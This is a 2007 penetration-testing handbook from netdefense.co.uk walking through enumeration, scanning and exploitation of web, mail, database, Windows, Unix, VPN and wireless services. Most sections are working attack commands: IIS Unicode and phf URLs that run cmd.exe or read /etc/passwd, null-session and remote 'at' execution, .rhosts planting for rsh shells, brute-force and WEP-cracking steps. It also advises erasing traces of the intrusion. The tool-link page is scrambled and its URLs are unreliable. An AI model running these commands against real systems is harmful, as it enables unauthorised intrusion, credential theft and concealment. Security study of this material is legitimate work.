Penetration Testing Security Audits and Assessments

http://www.netdefense.co.uk
info@netdefense.co.uk

Introduction to Penetration Testing

A Penetration Test is a method of evaluating the security of a computer system or network by simulating an attack by a hacker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of security vulnerabilities. Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution.

Black box vs. White box Penetration tests can be conducted in several ways. The most common difference is the amount of knowledge of the implementation details of the system being tested that are available to the testers. Black box testing assumes no prior knowledge of the infrastructure to be tested, and the testers must first determine the location and extent of the systems before commencing their analysis. At the other end of the spectrum, white box testing provides the testers with complete knowledge of the infrastructure to be tested, often including network diagrams, source code and IP addressing information. There are also several variations in between, often known as gray box tests. Penetration tests may also be described as Full disclosure, partial disclosure or blind tests based on the amount of information provided to the testing party.

Page 1 of 22
This material is not endorsed by, sponsored by or affiliated with any of the vendors mentioned. Cisco, Microsoft, Checkpoint, Solaris, Google and all other companies mentioned are all owners of their respective trademarks and Logos. This material is for study and education purposes only and netdefense.co.uk cannot be held responsible for any damage caused by improper use of the tools and methods described. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner. Netdefense.co.uk is not responsible for the content of external links and cannot assure that all of them work. Search for alternatives on Google in case of a broken link. © 2007 netdefense.co.uk – All rights reserved.

Penetration Testing Security Audits and Assessments

http://www.netdefense.co.uk
info@netdefense.co.uk
The 6 steps of a penetration test 1. Enumeration Gathering as many passive facts about the target system as possible. The following are common enumeration techniques (Web Searches on Google, johnny.ihackstuff.com, Newsgroups, NIC queries, Whois, DNS queries and SMTP probing). Goal: Learn about the target 2. IP Scanning The next step is to scan the target system. Methods include ICMP scanning and probing, TCP and UDP port scanning, Third Party TCP scanning. Common scan tools are NMAP, SING, hping2, lsrscan and fragroute. Goal: Identify open services on target 3. Assessing discovered services Evaluate the versions of Web, FTP, Database, Mail, VPN, Telnet, SSH, DNS, SNMP, LDAP, X-Windows etc. services running on various platforms such as Microsoft or Unix through manual and automated fingerprinting. Goal: Find out which versions of the services are in place 4. Find or write exploits Once fingerprinting has been completed, consult the following websites to check whether exploits are available for the version discovered: securityfocus.com, cve.mitre.org, xforce.iss.net, packetstormsecurity.org, kb.cert.org/vuls. Goal: Find the “key” to enter the system 5. Exploit the target system Use the exploits discovered and run them against the target in order to gain access to the target network. Erase traces on the target network that would indicate your presence. Goal: Unauthorized Access to the target system 6. Document the vulnerabilities and recommend on how to close holes Document which exploits worked on which services and present it to the owner of the target network. Consult the websites of the services you have discovered being vulnerable and advise to upgrade to latest versions. Goal: Close the security holes down

Page 2 of 22
This material is not endorsed by, sponsored by or affiliated with any of the vendors mentioned. Cisco, Microsoft, Checkpoint, Solaris, Google and all other companies mentioned are all owners of their respective trademarks and Logos. This material is for study and education purposes only and netdefense.co.uk cannot be held responsible for any damage caused by improper use of the tools and methods described. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner. Netdefense.co.uk is not responsible for the content of external links and cannot assure that all of them work. Search for alternatives on Google in case of a broken link. © 2007 netdefense.co.uk – All rights reserved.

sponsored by or affiliated with any of the vendors mentioned.com/download/SuperScan.com/networksa/tools/ Around 100 of the best penetration test tools Others sources immunity canvas http://www.htm N-Stealth scanner http://www.com/eng/products/nstealth/ SuperScan4.com/univercd/cc/td/doc/product/iaabu/csscan/csscan2/csscu g/overview. Solaris.php Loads of bootable Linux Live CDs with Penetration Test Tools http://www.oreilly.co.nstalker.uk is not responsible for the content of external links and cannot assure that all of them work.nessus.immunitysec.uk Tools and Links Most tools are available for free on the Internet. Microsoft. Search for alternatives on Google in case of a broken link. The Best 3 sources http://www.html Page 3 of 22 This material is not endorsed by.htm Tool Link List http://www. Google and all other companies mentioned are all owners of their respective trademarks and Logos. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.0 http://www.remote-exploit.php CSS Cisco security scanner http://www. © 2007 netdefense.co. Cisco.co.scanwith.topshareware.com/content/livecd.Penetration Testing Security Audits and Assessments http://www.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.frozentech.org/ ISS internet scanner http://www.co.netdefense. Netdefense.net/products_services/enterprise_protection/vulnerability_asses sment/scanner_internet.insecure. Checkpoint.org/ nmap http://www. .shtml ipscanner: (linux and windows) http://www.iss.uk – All rights reserved.org/tools.uk info@netdefense.com/IPScanner-download-11457.org Back Track Security Suite – The Best freeware Hacking CD http://examples.htm metasploit http://metasploit. This material is for study and education purposes only and netdefense.insecure.com/index.cisco.org/nmap/ nessus http://www.co.

com 3. Google and all other companies mentioned are all owners of their respective trademarks and Logos.securityfocus.companyxyz.com Page 4 of 22 This material is not endorsed by.com” +tel +fax Other common search strings: site:.org Enumeration In the enumeration phase as many facts as possible are gathered about the target network.com Security Focus http://www.uk Vulnerability Databases Milw0rm http://www.com Go to http://johnny.packetstormsecurity.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.metasploit.co.companyxyz.co.uk info@netdefense. Cisco.uk – All rights reserved.com companyxyz. . Microsoft.spamspade. Checkpoint.ihackstuff.co.com allintitle: “index of /” site:. Under Unix use the WHOIS utility: whois Use: http://www.Penetration Testing Security Audits and Assessments http://www. sponsored by or affiliated with any of the vendors mentioned.com Packetstormsecurity http://www. Netdefense.uk is not responsible for the content of external links and cannot assure that all of them work.com Metasploit http://www. Search for alternatives on Google in case of a broken link.com for many more Google search strings 2. NIC Querying Use the Samspade client http://www. 1.milw0rm.allwhois.netdefense. Google Looking for phone and fax numbers of companyxyz.co. DNS Querying Use the nslookup tool nslookup set type=any companyxyz. © 2007 netdefense.org and enter the IP or domain-name of the target network. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.co. Solaris.com Search string: +”companyxyz. This material is for study and education purposes only and netdefense.

uk Use the host command (Unix) host companyxyz. Solaris. 5.com Wait for the failure mail coming back from their server.co.com or ping 192.uk – All rights reserved. Search for alternatives on Google in case of a broken link.1 Traceroute shows the path any packet takes from your machine to the target host: traceroute www.co.co. Microsoft.uk info@netdefense.1.netdefense.com (whichever the DNS authority for this domain is) ls –d companyxyz. PING and TRACEROUTE PING uses ICMP packets (per default Echo Request and Echo Reply).168.com >\> /tmp/zone_out (to write output into a file) 4. If a reply is received. SMTP Probing Send an email to a known wrong address of the target network such as blahblah@companyxyz. host is active. It will contain valuable information about the mail setup. . ping www. © 2007 netdefense.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.Penetration Testing Security Audits and Assessments http://www.com or traceroute 192. Checkpoint.com server companyxyz.companyxyz.uk is not responsible for the content of external links and cannot assure that all of them work.com or ls –d comanyxyz. Netdefense.com any Try a DNS zone transfer (if successful. Cisco.1. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner. Google and all other companies mentioned are all owners of their respective trademarks and Logos.co. This material is for study and education purposes only and netdefense. sponsored by or affiliated with any of the vendors mentioned.companyxyz. the whole target network DNS IP – to – Name mapping will be revealed) nslookup set type=any companyxyz.com Use the dig command dig companyxyz.168.co.1 (command is tracert on Windows) Page 5 of 22 This material is not endorsed by.

/24 TCP Port Scanning types Vanilla Scan (no stealth. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.co. Netdefense. active hosts on the target network are scanned for activity (ie ICMP) and for all open TCP and UDP services.0/24 Next we identify the subnet broadcast addresses: nmap –sP 192.uk IP Scanning In the IP Scanning phase.uk cannot be held responsible for any damage caused by improper use of the tools and methods described. Microsoft.co.uk – All rights reserved.uk info@netdefense.co. © 2007 netdefense.168.CLOSED Page 6 of 22 This material is not endorsed by. This material is for study and education purposes only and netdefense.RST/ACK -> PORT CLOSED UDP Port Scanning Response Codes NO RESPONSE TO UDP PROBE .netdefense.168. Google and all other companies mentioned are all owners of their respective trademarks and Logos. .co. Search for alternatives on Google in case of a broken link. Checkpoint. Solaris. Cisco.OPEN ICMP TYPE 3 CODE 13 RECEIVED .NO RESPONSE -> PORT OPEN FIN/URG/PSH/NULL SEND .Penetration Testing Security Audits and Assessments http://www.0.co. NMAP Download the NMAP tool (either UNIX or Windows based) from http://insecure. active connect scan) TCP Half-Open SYN Scan (only SYN packet sent) XMAS Scan (all flags are set) Null Scan (No flags are set) TCP Port Scanning Response Codes SYN SEND – SYN/ACK RECEIVED -> PORT OPEN SYN SEND – RST/ACK RECEIVED -> PORT CLOSED OR FIREWALLED SYN SEND – ICMP TYPE 3 CODE 13 RECEIVED -> ADMIN PROHIBITED SYN SEND – NOTHING RETURNED -> SILENTLY DROPPED FIN/URG/PSH/NULL SEND .1.1.org/nmap/ Use the NMAP tool to perform a PING SWEEP (ICMP pings to all hosts in a subnet to see which ones respond) nmap –sP –PI 192. sponsored by or affiliated with any of the vendors mentioned.uk is not responsible for the content of external links and cannot assure that all of them work.

txt 192. This material is for study and education purposes only and netdefense.uk – All rights reserved.1 -c = number of probe packets -s = source tcp port -p = dest port -S = set TCP SYN FLAG -F = set TCP FIN FLAG -A = set TCP ACK FLAG LSRSCAN Check for source routing vulnerabilities with “lsrscan”: lsrscan 192.123.10.10.168.0/24 Page 7 of 22 This material is not endorsed by.co.co.1. NMAP Scan common TCP services nmap -sS -P0 -p21.co.txt 192.168.161 -oG output. Netdefense.168. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.0/24 common UDP services nmap -sU -P0 -p6.69.0/24 Guessing the Operating System of the target network with NMAP nmap –O –sS 192.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.10.1 NMAP will try to reveal the Operating System HPING2 hping2 -c 3 -s 53 -p 139 -S 192.168. Solaris.168.Penetration Testing Security Audits and Assessments http://www.110 -oG output.FLAGS SET) -sI (IP ID header scan) -sS (SYN Stealth) -sU (UDP Scan) -p (Port to scan) Assessment of either the common (shorter scan) or all TCP and UDP services on the target network or host.1.0/24 FULL UDP SCAN nmap -sU -P0 -p1-65535 -o output.53. .137. Search for alternatives on Google in case of a broken link.co.25. Microsoft.80.0/24 FULL TCP SCAN nmap -sS -P0 -p1-65535 -v -A -o output.txt 192.netdefense.168.10.168. Cisco.co.uk is not responsible for the content of external links and cannot assure that all of them work. Checkpoint.uk info@netdefense.1. sponsored by or affiliated with any of the vendors mentioned. © 2007 netdefense. Google and all other companies mentioned are all owners of their respective trademarks and Logos.uk Common NMAP options -sF (FIN FLAG) -sN (NULL FLAG) -sX (ALL-XMAS.txt 192.53.

168. . It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.1 79 or finger @192.1.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.uk Remote Information Services RIS are common on the majority of all systems.1. It has many flaws and many users leave the default community strings in place. Checkpoint.co. Netdefense.uk – All rights reserved.10 15 DNS A DNS zone file contains all name to IP mappings for a specific network/zone.com companyxyz.1 SNMP Simple Network Management Protocol runs on most systems on UDP port 161.co.co.com) can be shown.1. If this file can be obtained.companyxyz.co. This material is for study and education purposes only and netdefense.uk info@netdefense.uk is not responsible for the content of external links and cannot assure that all of them work. Search for alternatives on Google in case of a broken link.168.1.companyxyz. Solaris. Unix Systat and Netstat These services contain valuable information about network and system processes. Google and all other companies mentioned are all owners of their respective trademarks and Logos. Cisco. all mappings for example (192.co.168.1. Page 8 of 22 This material is not endorsed by. © 2007 netdefense.netdefense.Penetration Testing Security Audits and Assessments http://www. Microsoft. Check Systat and Netstat: A telnet to port 11 (Systat) telnet 192.1.com axfr Finger The Finger Service is an information service enabled per default on many platforms on TCP port 79 To check whether it is enabled: telnet 192.1 = mail.10 11 A telnet to port 15 (Netstat) telnet 192.168. sponsored by or affiliated with any of the vendors mentioned. Find the DNS server which is the authority for a zone via nslookup (see DNS enumeration) Attempt a DNS zone transfer with the “dig” tool dig @nameserver.

Netdefense. Checkpoint.168. This material is for study and education purposes only and netdefense.1 (ADMsnmp tool) snmpwalk –c private 192.1 Gather usernames on WIN NT & 2000 where SNMP is enabled snmpwalk –c public 192.6.1.168.1 Exploits Once you obtained the server’s version.co.0.uk – All rights reserved. Unix Tool ldapsearch ldapsearch –h 192. Google and all other companies mentioned are all owners of their respective trademarks and Logos. sponsored by or affiliated with any of the vendors mentioned.co.1 The tool “rusers” can perform the same: rusers –l 192.168.168.1.77. Search for alternatives on Google in case of a broken link. Cisco.168.25 Upload a config through SNMP: The tool “snmpset” can be used to upload a config through SNMP to a router for example LDAP LDAP on Windows 2000 Active Directory often has got vulnerabilities which can reveal crucial data.Penetration Testing Security Audits and Assessments http://www.0.co. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.3.1 snmpwalk –c public 192.2.1. Microsoft.0.168.uk Tools to check SNMP: ADMsnmp 192.co.co.1 .168.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.0. search for exploits in vulnerability databases (See Tools & Links section) Page 9 of 22 This material is not endorsed by.uk info@netdefense.1.0.4.1.netdefense.1.uk is not responsible for the content of external links and cannot assure that all of them work.1 RWHO This service runs on Unix machines on UDP port 513 and exploiting it can reveal all users currently logged into the remote target system: rwho 192. Solaris. . © 2007 netdefense.

com N-Stealth (Windows based) www.netdefense.pl –host www.com 80 followed by: OPTIONS / HTTP/1.com 80 followed by: HEAD / HTTP/1.uk is not responsible for the content of external links and cannot assure that all of them work. they exist in large numbers and always have vulnerabilities. Cisco.co. © 2007 netdefense.0 and twice the enter key Automated Web Server Assessment Tools Nikto (Unix based) perl nikto. sponsored by or affiliated with any of the vendors mentioned.com/nstealth/ Paths Poorly protected information can usually be found in the following paths: /backup /private /test Microsoft Outlook Web Access Check for /owa /exchange /mail Page 10 of 22 This material is not endorsed by. Microsoft. . Search for alternatives on Google in case of a broken link. Solaris.uk – All rights reserved.uk Web Servers Webservers are usually either UNIX based (ie Apache) or Microsoft based (IIS) and due to their nature of providing public service.companyxyz.co. Netdefense.co.companyxyz.0 and twice the enter key Reveal HTTP Options telnet www. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.companyxyz. This material is for study and education purposes only and netdefense. Checkpoint.co.uk info@netdefense. Fingerprinting a webserver telnet www.nstalker.Penetration Testing Security Audits and Assessments http://www.uk cannot be held responsible for any damage caused by improper use of the tools and methods described. Google and all other companies mentioned are all owners of their respective trademarks and Logos.co.

example. sponsored by or affiliated with any of the vendors mentioned.uk info@netdefense.hoobie.168.co./.uk is not responsible for the content of external links and cannot assure that all of them work.1 Page 11 of 22 This material is not endorsed by. Microsoft.netdefense.1./. Google and all other companies mentioned are all owners of their respective trademarks and Logos.1..1 22 This will reveal the SSH implementation and version Telnet Fingerprinting telnet 192. .. Netdefense.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.uk IIS Unicode Exploits Add to URL path www.co. Cisco. Search for alternatives on Google in case of a broken link./. Brutus is the default tool: http://www. Checkpoint.co.1./winnt/system32/cmd.example. © 2007 netdefense../xscan 192.Penetration Testing Security Audits and Assessments http://www.exe?/c+dir www.com/scripts/./ www.. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.com/cgi-bin/phf?Qalias+x%0a/bin/cat%20/etc/passwd HTML source code Check the source code by right-clicking the mouse when over a website Look for: CGI Form passwords Exploits Once you obtained the server’s version.%255c. search for exploits in vulnerability databases (See Tools & Links section) Remote Access Services These services are used to remotely manage and maintain server and networking components..168.168.co. This material is for study and education purposes only and netdefense. SSH (Secure Shell) Fingerprinting telnet 192.example.co.net/brutus/ X-Windows Used in many networks in order to export a display to a remote host Fingerprinting X-Servers with the tool “xscan” .. Solaris./.com/.uk – All rights reserved..1 Against both telnet and SSH a brute-force attack can be launched (trying different username and password pair combinations).

co. search for exploits in vulnerability databases (See Tools & Links section) Page 12 of 22 This material is not endorsed by.uk info@netdefense.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.uk Microsoft Desktop Protocol Remote desktop protocol provides remote access to windows desktop. Cisco./citrix-pa-scan 192. Search for alternatives on Google in case of a broken link. Solaris.uk is not responsible for the content of external links and cannot assure that all of them work. Netdefense.phenoelit.de Citrix Citrix is a thin client Windows service that is accessed through port 1494 TCP on the server side Unix tool “citrix-pa-scan” can reveal published applications: . Google and all other companies mentioned are all owners of their respective trademarks and Logos./vncrack –h 192.1 Exploits Once you obtained the server’s version.txt is a dictionary file) Using “x4” a Windows based tool: Get from http://ww.1. Runs on TCP port 3389 Using “tsgrinder” to gain brute-force into a machine tsgrinder –w words – l leet – d workgroup –u administrator –b –n 2 192.Penetration Testing Security Audits and Assessments http://www.uk – All rights reserved. This material is for study and education purposes only and netdefense.co.168.co.netdefense. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.1 –w common. sponsored by or affiliated with any of the vendors mentioned.1 VNC Virtual Network Computing is a simple network management tool for remote desktops and can easily be exploited Using “vncrack” a Unix based tool: .txt (where common.1.co. Microsoft. © 2007 netdefense.168. .co.168.1. Checkpoint.

Microsoft. This material is for study and education purposes only and netdefense. Checkpoint. Search for alternatives on Google in case of a broken link. Solaris.uk FTP Servers and Databases FTP Servers FTP Servers are file sharing devices and very common in modern networks.com If login is successful. © 2007 netdefense.168. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.1. . issue “ls” and “HELP” commands Gather valid username : telnet 192.co.1. Cisco.1. sponsored by or affiliated with any of the vendors mentioned.1 Check for anonymous login: User: anonymous Password: something@somthing.1 21 CWD ~blah CWD ~test CWD ~admin until Code 530 shows up: Please login with USER and PASS Then exploit: ftp 192.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.co.uk – All rights reserved.168. Google and all other companies mentioned are all owners of their respective trademarks and Logos.uk is not responsible for the content of external links and cannot assure that all of them work.co.1 USER: admin PASS : blah CWD ~ ls –ls /core strings /core | grep :: Page 13 of 22 This material is not endorsed by. Netdefense.co.uk info@netdefense.netdefense.Penetration Testing Security Audits and Assessments http://www.co. Checking for FTP Server version ftp 192.168.

It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.co. .1. Solaris. Search for alternatives on Google in case of a broken link.uk Microsoft SQL Servers MS SQL servers are SQL databases to store large amounts of user data Assess MS SQL Servers with “sqlping” sqlping 192.uk is not responsible for the content of external links and cannot assure that all of them work.168.co.Penetration Testing Security Audits and Assessments http://www.168. sponsored by or affiliated with any of the vendors mentioned. Microsoft.co. Checkpoint.1. Cisco.co.168.1 My SQL General Assessment The MySQL service runs on port 3306 A telnet to that port reveals more details about the version in use telnet 192. Check the TNS listener with the “tnscmd” tool (Unix) perl tsncmd.pl –h 192. © 2007 netdefense. Google and all other companies mentioned are all owners of their respective trademarks and Logos.1. search for exploits in vulnerability databases (See Tools & Links section) Page 14 of 22 This material is not endorsed by. Netdefense.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.1 3306 Exploits Once you obtained the server’s version.1 MS SQL Brute Force attack with “sqlbf” sqlbf follow options and specify username and password lisr Oracle Databases Oracle Databases are the most popular commercial databases in today’s markets and widespread The TNS listener is the component through which clients connect into the database. This material is for study and education purposes only and netdefense.co.netdefense.uk – All rights reserved.uk info@netdefense.

Cisco. Solaris. Google and all other companies mentioned are all owners of their respective trademarks and Logos. The tool “dcom” can be used: Page 15 of 22 This material is not endorsed by. Messenger Service and Workstation service).1 The “rpcdump” is an advanced tool to enumerate RPC service information. This material is for study and education purposes only and netdefense.168.uk – All rights reserved.co.1 Brute-Forcing Administrator passwords Many Windows machines can be accessed through the default Administrator account: “Administrator” Hint: Try “Administrator” with a blank password initially. Windows Enumeration A variety of enumeration tools are available for MS Windows operating systems. WMICracker 192. The tool “WMICracker” can be used to launch a brute-force attack with dictionary files.uk Windows Penetration Mircrosoft Windows products are popular throughout today’s networks due to its user friendliness.Penetration Testing Security Audits and Assessments http://www.1. sponsored by or affiliated with any of the vendors mentioned. Checkpoint.co.uk is not responsible for the content of external links and cannot assure that all of them work.1.netdefense. The “epdump” tool queries the RPC endpoint mapper running on port 135 TCP epdump 192.168. Netdefense.co.co. © 2007 netdefense. Microsoft.txt Gaining access may also be possible through vulnerabilities in the RPC services (DCOM.168.1 or rpcdump –v 192.1.168. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.securityfriday) tool is a graphical version of the rpcdump tool The “Walksam” tool queries the SAMR interface in order to reveal user information walksam 192.1 (more detailed information) The “RpcScan” (www. . rpcdump 192. Search for alternatives on Google in case of a broken link.1 Administrator words.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.168.uk info@netdefense.1.co.1.

1 An advanced tool to collect more valuable information about a windows target is “winfo”: winfo 192.txt –u users.1. For CIFS enumeration use the tool “smbdumpusers” C:\smbdumpusers –i 192.168. © 2007 netdefense.uk is not responsible for the content of external links and cannot assure that all of them work.Penetration Testing Security Audits and Assessments http://www.uk . This material is for study and education purposes only and netdefense. Search for alternatives on Google in case of a broken link.co.1.1 NetBIOS Name Service The NetBIOS name service is accessible through UDP port 137. Solaris./dcom Views options Example attack on Windows 2000 SP4 english (option 5) .co. Cisco.1 05:30 c:\temp\anything. Google and all other companies mentioned are all owners of their respective trademarks and Logos. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner. The tool “nbtstat” can be used to enumerate the NetBIOS name table: Nbtstat –A 192.1 –m -2 –P1 The CIFS Brute-Force tool “smbbf” is used for dictionary attacks using a user list and a password list smbbf –i 192.1.uk info@netdefense.txt –v –P1 Exploits Once you obtained the server’s version.168.1 –p common.uk – All rights reserved. Netdefense.1.co.1. sponsored by or affiliated with any of the vendors mentioned.exe CIFS Service The CIFS service (Common Internet File System) is running on both UPD and TCP ports 445 and enables SMB access.co.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.1 Authentication with NetBIOS Once a valid user account password has been obtained. Microsoft.168. search for exploits in vulnerability databases (See Tools & Links section) Page 16 of 22 This material is not endorsed by.1.168.168.1\ADMIN$ secret /user:administrator Afterwards you can execute programs: at \\192.1.netdefense.1 Sensitive information can also be gathered through creating a “null session” on TCP port 139: net use \\target\IPC$ “” /user: “” The tool “enum” can be used to enumerate the NetBIOS session service: enum –UGP 192.co. NetBIOS can be used to authenticate: net use \\target\IPC$ password /user:username for example: net use \\192. Checkpoint.168. .168.168.1./dcom 5 192.

companyxyz.co. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner. quit Page 17 of 22 This material is not endorsed by.com DATA Subject: Test your text .companyxyz.companyxyz.co. Search for alternatives on Google in case of a broken link.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.uk is not responsible for the content of external links and cannot assure that all of them work. Google and all other companies mentioned are all owners of their respective trademarks and Logos.com smtpscan mail. Netdefense.co. Solaris.uk info@netdefense.com 25 HELO world (or the FQDN of the mail server) HELP (might give help commands) EXPN root (reveals details of whether that email account “root” exists VRFY accounting (reveals whether accouting@companyxyz. Cisco.co. use the tools “smtpmap” and “smtpscam”: smtpmap mail.com is valid) then MAIL FROM: test@test. Microsoft.co.com To check whether SPAM mail can be relayed: telnet mail.uk – All rights reserved. Checkpoint.Penetration Testing Security Audits and Assessments http://www.uk Mail Servers Mail servers use the common well-known ports smtp – 25/tcp pop2 – 109/tcp pop3 – 110/tcp imap2 – 143/tcp ssmtp – 465/tcp imaps – 993/tcp pop3s – 995/tcp SMTP To fingerprint SMTP services. . © 2007 netdefense. sponsored by or affiliated with any of the vendors mentioned.com RCPT TO: anything@anything. This material is for study and education purposes only and netdefense.netdefense.

Enumerating Unix RPC services with the tool “rpcinfo” and “nmap”: rpcinfo –p 192.gz http://packetstormsecurity. Search for alternatives on Google in case of a broken link.org/Crackers/Pop_crack.org/groups/Crackers/hv-pop3crack. Page 18 of 22 This material is not endorsed by. NFS and CDE. Checkpoint.com PASS password Once in read mails: RETR 1 (where number 1 is the mail number 1 on the POP3 server) DELE 1 (would delete mail number 1) Brute-force tools for POP3 mail servers: http://packetstormsecurity. Solaris.co.uk info@netdefense. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.co. .uk is not responsible for the content of external links and cannot assure that all of them work.168.168.net/brutus Exploits Once you obtained the server’s version.netdefense.1.1 This will reveal port information and state of the services. search for exploits in vulnerability databases (See Tools & Links section) Unix Operation Systems Especially the industry has widely deployed servers based on Linux.com 110 USER Michael@companyxyz. This material is for study and education purposes only and netdefense. Google and all other companies mentioned are all owners of their respective trademarks and Logos.org/groups/ADM/ADM-pop.co.1.c http://packetstormsecurity. Cisco.hoobie.tar. Microsoft. sponsored by or affiliated with any of the vendors mentioned.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.co.pl IMAP Brute-force tools for IMAP mail servers: http://www.uk – All rights reserved.1 nmap –sR 192.uk POP3 To connect to a POP3 mail server: telnet mail. © 2007 netdefense.co.companyxyz. Unix and Solaris UNIX RPC These services are Unix daemons such as NIS+.Penetration Testing Security Audits and Assessments http://www. Netdefense.

168.1.co.co. This material is for study and education purposes only and netdefense. search for exploits in vulnerability databases (See Tools & Links section) Virtual Private Networks (VPNs) VPN PSK-Cracking IPSec services are gaining popularity in the industry.rhosts rsh –l bin 192.co.1. Netdefense. sponsored by or affiliated with any of the vendors mentioned. Search for alternatives on Google in case of a broken link.uk – All rights reserved.co. Unfortunately many security flaws exist in VPNs. Microsoft. © 2007 netdefense. Cisco.1.netdefense.uk is not responsible for the content of external links and cannot assure that all of them work. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.1 csh –i Exploits Once you obtained the server’s version. It is possible to discover the PSK (Pre-Shared key) of VPNs.168. .co.1:/home /mnt cd /mnt ls –la Change Directory into a discovered directory cd anythingdiscoverd echo + + > . Many companies form VPNs between their offices in order to transmit data encrypted and secure across the Internet. use the rootdown tool as follows: perl rootdown.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.168.1.Penetration Testing Security Audits and Assessments http://www. Solaris.168.1 csh –i For compromising a Solaris host as above. Google and all other companies mentioned are all owners of their respective trademarks and Logos.uk NFS Improperly configured NFS (Network File Systems) might allow direct host access through the “mount” command: showmount –e 192.1. Checkpoint.1 –i echo + + > /usr/bin/. Enumeration of VPNs with the tools “ipsecscan” and “ike-scan” Page 19 of 22 This material is not endorsed by.168.uk info@netdefense.pl –h 192.1 mount 192.rhosts cd / unmount /mnt Finally connect through remote shell: rsh –l anythingdiscovered 192.

Page 20 of 22 This material is not endorsed by.168.co.netdefense.168.10 There are 2 modes in IPSec (Aggressive Mode and Main Mode).1.1 192.co.com Exploits Once you obtained the server’s version.1.1. .168. If malicious code is written into these buffers. Search for alternatives on Google in case of a broken link. Implementation running aggressive mode might respond to an authentication request and a hashed authentication response may be sniffed.1 Another tool is “SensePost or sr.1. or the malicious code will be executed instead of the legitimate code. search for exploits in vulnerability databases (See Tools & Links section) Applications Buffer Overflow To keep it simple: Applications run in memory buffers (Heap.pl”. The tool “ikeprobe” in conjunction with “Cain & Abel” will be used as follows: ikeprobe 192. Checkpoint Some implementations of Checkpoint Firewalls have vulnerabilities which can reveal valid VPN usernames: The tool is “fw-ike-userguess”: fw-ike-userguess –file=testusers.1.uk They may discover active VPNs: ipsecscan 192.co.1 At the same time Cain & Abel must run on the same machine to capture hashed secrets which can then be de-crypted to obtain the PSK. It can be used to glean Checkpoint Firewalls for network information: perl sr. This material is for study and education purposes only and netdefense.companyxyz. Netdefense.pl firewall. Cisco.Penetration Testing Security Audits and Assessments http://www. © 2007 netdefense. Solaris.uk info@netdefense. It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner. sponsored by or affiliated with any of the vendors mentioned.uk – All rights reserved. Stack etc.10 (all hosts from .1. The application may either crash. legitimate traffic might be overwritten.uk cannot be held responsible for any damage caused by improper use of the tools and methods described. Microsoft. resulting in Denial of Service or unauthorized access.1 192.co.) when they are executed.168. Checkpoint.uk is not responsible for the content of external links and cannot assure that all of them work.txt –sport=0 192.co.10) ike-scan –showbackoff 192.168. Google and all other companies mentioned are all owners of their respective trademarks and Logos.1 to .168.

Checkpoint.uk info@netdefense. Google and all other companies mentioned are all owners of their respective trademarks and Logos.uk – All rights reserved./printme `perl –e ‘print “\x90\x90\x90\ (filled with 32 fields) \xbf”.co. you’ll need a laptop with a wireless card that supports packet injection such as Atheros chipset Orinoco Gold and the “Auditor” or “Backtrack” security CD (see tools section) Howto (Note: Change interface names accordingly). It is illegal in most countries to perform penetration tests without prior agreement of the network/system owner.’` With the tool “gbd” you can monitor as a program crashes. sponsored by or affiliated with any of the vendors mentioned. Search for alternatives on Google in case of a broken link. © 2007 netdefense.c” which has to be downloaded and compiled into an object file: cc –o printme printme. Exploits Once you obtained the server’s version.co. Cisco. where perl is used to distribute: .uk is not responsible for the content of external links and cannot assure that all of them work. Solaris.co. .co. Netdefense. To assess a Wireless LAN using the WEP key.co.c Test: . Use “Kismet” to scan for the target AP and write down the BSSID MAC address of the target AP Create a temporary directory mkdir wepcrack cd wepcrack/ Page 21 of 22 This material is not endorsed by. search for exploits in vulnerability databases (See Tools & Links section) Wireless LAN WEP WEP (Wired equivalent privacy) enabled WLANs are very widespread and it is very easy to crack the WEP key.Penetration Testing Security Audits and Assessments http://www./printme Test Sample of any stack overflow.uk One program to inject malicious code is “printme.uk cannot be held responsible for any damage caused by improper use of the tools and methods described.netdefense. This material is for study and education purposes only and netdefense. Microsoft.

